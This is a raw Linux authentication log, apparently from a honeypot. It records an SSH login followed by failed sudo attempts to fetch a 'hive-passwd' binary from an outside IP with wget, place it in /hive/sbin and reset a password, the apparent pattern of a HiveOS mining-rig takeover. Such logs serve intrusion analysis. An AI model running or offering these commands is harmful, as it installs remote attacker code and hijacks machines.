Nov 14 20:16:38 nobanner-nosession-45510 systemd-logind[165]: New seat seat0.
Nov 14 20:16:42 nobanner-nosession-45510 sudo:     root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/bin/apt-get update
Nov 14 20:16:42 nobanner-nosession-45510 sudo: pam_unix(sudo:session): session opened for user root by (uid=0)
Nov 14 20:16:51 nobanner-nosession-45510 sudo: pam_unix(sudo:session): session closed for user root
Nov 14 20:16:51 nobanner-nosession-45510 sudo:     root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/bin/apt-get install openssh-server -y
Nov 14 20:16:51 nobanner-nosession-45510 sudo: pam_unix(sudo:session): session opened for user root by (uid=0)
Nov 14 20:17:01 nobanner-nosession-45510 CRON[487]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 14 20:17:01 nobanner-nosession-45510 CRON[487]: pam_unix(cron:session): session closed for user root
Nov 14 20:17:11 nobanner-nosession-45510 useradd[759]: new user: name=sshd, UID=106, GID=65534, home=/run/sshd, shell=/usr/sbin/nologin, from=none
Nov 14 20:17:11 nobanner-nosession-45510 usermod[767]: change user 'sshd' password
Nov 14 20:17:11 nobanner-nosession-45510 chage[774]: changed password expiry for sshd
Nov 14 20:17:13 nobanner-nosession-45510 sshd[1209]: Server listening on 0.0.0.0 port 22.
Nov 14 20:17:13 nobanner-nosession-45510 sshd[1209]: Server listening on :: port 22.
Nov 14 20:17:15 nobanner-nosession-45510 sudo: pam_unix(sudo:session): session closed for user root
Nov 14 20:17:15 nobanner-nosession-45510 sudo:     root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/bin/apt-get install -y curl
Nov 14 20:17:15 nobanner-nosession-45510 sudo: pam_unix(sudo:session): session opened for user root by (uid=0)
Nov 14 20:17:22 nobanner-nosession-45510 sudo: pam_unix(sudo:session): session closed for user root
Nov 14 20:30:08 nobanner-nosession-45510 useradd[1552]: new group: name=user, GID=1001
Nov 14 20:30:08 nobanner-nosession-45510 useradd[1552]: new user: name=user, UID=1001, GID=1001, home=/home/user, shell=/bin/bash, from=none
Nov 14 20:30:08 nobanner-nosession-45510 usermod[1561]: change user 'user' password
Nov 14 20:30:08 nobanner-nosession-45510 sshd[1568]: Accepted password for user from 10.0.3.1 port 32900 ssh2
Nov 14 20:30:08 nobanner-nosession-45510 sshd[1568]: pam_unix(sshd:session): session opened for user user by (uid=0)
Nov 14 20:30:08 nobanner-nosession-45510 systemd-logind[165]: New session 1365 of user user.
Nov 14 20:30:08 nobanner-nosession-45510 systemd: pam_unix(systemd-user:session): session opened for user user by (uid=0)
Nov 14 20:30:09 nobanner-nosession-45510 sudo: pam_unix(sudo:auth): conversation failed
Nov 14 20:30:09 nobanner-nosession-45510 sudo: pam_unix(sudo:auth): auth could not identify password for [user]
Nov 14 20:30:09 nobanner-nosession-45510 sudo:     user : user NOT in sudoers ; TTY=unknown ; PWD=/home/user ; USER=root ; COMMAND=hive-passwd set ifjeeisurofmioufiose
Nov 14 20:30:09 nobanner-nosession-45510 sudo: pam_unix(sudo:auth): conversation failed
Nov 14 20:30:09 nobanner-nosession-45510 sudo: pam_unix(sudo:auth): auth could not identify password for [user]
Nov 14 20:30:09 nobanner-nosession-45510 sudo:     user : user NOT in sudoers ; TTY=unknown ; PWD=/home/user ; USER=root ; COMMAND=hive-passwd ifjeeisurofmioufiose
Nov 14 20:30:09 nobanner-nosession-45510 sudo: pam_unix(sudo:auth): conversation failed
Nov 14 20:30:09 nobanner-nosession-45510 sudo: pam_unix(sudo:auth): auth could not identify password for [user]
Nov 14 20:30:09 nobanner-nosession-45510 sudo:     user : user NOT in sudoers ; TTY=unknown ; PWD=/home/user ; USER=root ; COMMAND=/usr/bin/wget http://185.196.9.109/qwe/hive-passwd -O /hive/sbin/hive-passwd
Nov 14 20:30:09 nobanner-nosession-45510 sudo: pam_unix(sudo:auth): conversation failed
Nov 14 20:30:09 nobanner-nosession-45510 sudo: pam_unix(sudo:auth): auth could not identify password for [user]
Nov 14 20:30:09 nobanner-nosession-45510 sudo:     user : user NOT in sudoers ; TTY=unknown ; PWD=/home/user ; USER=root ; COMMAND=dos2unix /hive/sbin/hive-passwd
Nov 14 20:30:09 nobanner-nosession-45510 sudo: pam_unix(sudo:auth): conversation failed
Nov 14 20:30:09 nobanner-nosession-45510 sudo: pam_unix(sudo:auth): auth could not identify password for [user]
Nov 14 20:30:09 nobanner-nosession-45510 sudo:     user : user NOT in sudoers ; TTY=unknown ; PWD=/home/user ; USER=root ; COMMAND=hive-passwd set ifjeeisurofmioufiose
Nov 14 20:30:09 nobanner-nosession-45510 sshd[1585]: Received disconnect from 10.0.3.1 port 32900:11: 
Nov 14 20:30:09 nobanner-nosession-45510 sshd[1585]: Disconnected from user user 10.0.3.1 port 32900
Nov 14 20:30:09 nobanner-nosession-45510 sshd[1568]: pam_unix(sshd:session): session closed for user user
Nov 14 20:30:09 nobanner-nosession-45510 systemd-logind[165]: Session 1365 logged out. Waiting for processes to exit.
Nov 14 20:30:09 nobanner-nosession-45510 systemd-logind[165]: Removed session 1365.
